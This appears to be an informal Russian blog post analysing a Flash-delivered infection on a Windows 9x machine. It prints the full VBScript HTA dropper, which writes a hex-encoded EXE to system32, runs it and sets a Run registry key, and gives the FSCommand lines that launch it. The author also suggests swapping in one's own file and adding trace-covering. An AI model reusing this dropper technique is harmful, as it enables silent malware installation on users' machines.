• Партнер

  • I am a man who walks alone
    And when I'm walking a dark road
    At night or scrolling through the park
    When the light begins to change
    I some times feel a little strange
    A little anxiouns when it's dark
    ("Fear of the dark" Iron Maiden)

    Здарова дружище вот решил с тобой потолковать на тему компьютерных
    заболеваний. В одно из обычных путешествий по Inet'у я заметил, что мой
    Осёл повесился, ну я подумал что это обычный сбой 98-х дверей от Гейтса.
    Ну ребутнулся, конектинг снова вызвал тот же сбой. Лады, думаю, где там у
    меня касперский завалялся. Каспер-про тоже подумал и заявил, что мол
    нету у тебя заболеваний. Ну я ему не очень поверил и решил сам за него
    поработать. Полез ACDSee'ей в Temporary Internet Files и там все
    пощупал. Наткнулся на Flash ролик, после запуска которого вылетело окно hta приложение со странными
    закорючками. Ага, подумал я, попался. Был подсажен вирь с
    целью зомбирования моего компа.

    Изучая данный файл (который довольно прост) можно увидеть, что сборка
    exe вируса происходит на стороне клиента и после уже прописывает
    себя в реестр Window. А вирус в свою очередь заносится в ядро винды.
    Дейстие вируса направлено на создание ошибок в ОС.
    Вирус запускается с помощью flash ролика. Любой Win9x пользователь,
    посетивший страницу с данным flash-роликом, будет заражен.

    Текст hta файла:

    &v=<script language=vbs>Set o=CreateObject("Scripting.FileSystemObject") 
    Set s=CreateObject("WScript.Shell") 
    p=s.ExpandEnvironmentStrings("%WinDir%\system32\winvm32.exe") 
    If not o.FileExists(p) Then 
    t=Split("4D,5A,90,00,(... 
    ... // Здесь распологается тело exe файла в 16-ричном виде 
    ... // (что нам мешает свой файл вставить?) 
    ...)00,00,00",",") 
    Set f=o.CreateTextFile(p,2) 
    For i=0 To UBound(t) 
    f.Write chr(Int("&H"&t(i))) 
    Next 
    f.Close 
    s.run(p) 
    s.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinVM32",p,"REG_SZ" 
    End If 
    close()</script> 

    Из Flash'а данный файл запускается командами Flash ActionScript:

    FSCommand: save c:\temp.hta
    FSCommand: exec mshta.exe c:\temp.hta

    Просмотрев само тело собранного файла я обнаружил, что он сделан UPX Team
    http://vpx.tsx.org. Cайт данной команды указывает на то что она занимается
    системными ошибками. В данном примере не
    хватает хотя бы батника для заметания следов.
    Вот такие вот колдуны...

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии